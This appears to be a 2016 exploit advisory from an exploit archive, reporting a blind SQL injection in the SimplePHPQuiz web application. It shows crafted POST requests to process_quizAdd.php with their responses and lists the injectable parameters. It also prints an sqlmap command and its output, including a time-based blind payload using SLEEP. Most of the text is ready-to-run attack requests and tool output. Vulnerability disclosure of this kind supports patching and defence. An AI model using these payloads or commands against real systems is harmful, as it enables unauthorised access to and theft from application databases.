Home / os / winmobile

SimplePHPQuiz Blind SQL Injection

Posted on 25 August 2016

# Exploit Title: SimplePHPQuiz - Blind SQL Injection # Date: 2016-08-23 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz # Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip # Version: [app version] (REQUIRED) # Version: Latest commit # Tested on: Debian [wheezy] ### Vulnerability 1-1. Nomal Request POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1 Host: 127.0.0.1 ..snip.. Content-Length: 96 question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit 1-2 Response <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer"> <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p> 2-1 Attack Request 1 POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1 Host: 127.0.0.1 ..snip.. Content-Length: 96 question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit 2-2 Response <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer"> <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p> 3-1 Attack Request 2 POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1 Host: 127.0.0.1 ..snip.. Content-Length: 96 question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit 3-2 Response <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer"> <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p> ### Weak Parameters correct_answer parameter question parameter wrong_answer1 parameter wrong_answer2 parameter wrong_answer3 parameter ### SQLMAP Result #> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer ...snip... POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 117 HTTP(s) requests: --- Parameter: correct_answer (POST) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit --- [17:52:05] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.10

 

TOP

Malware :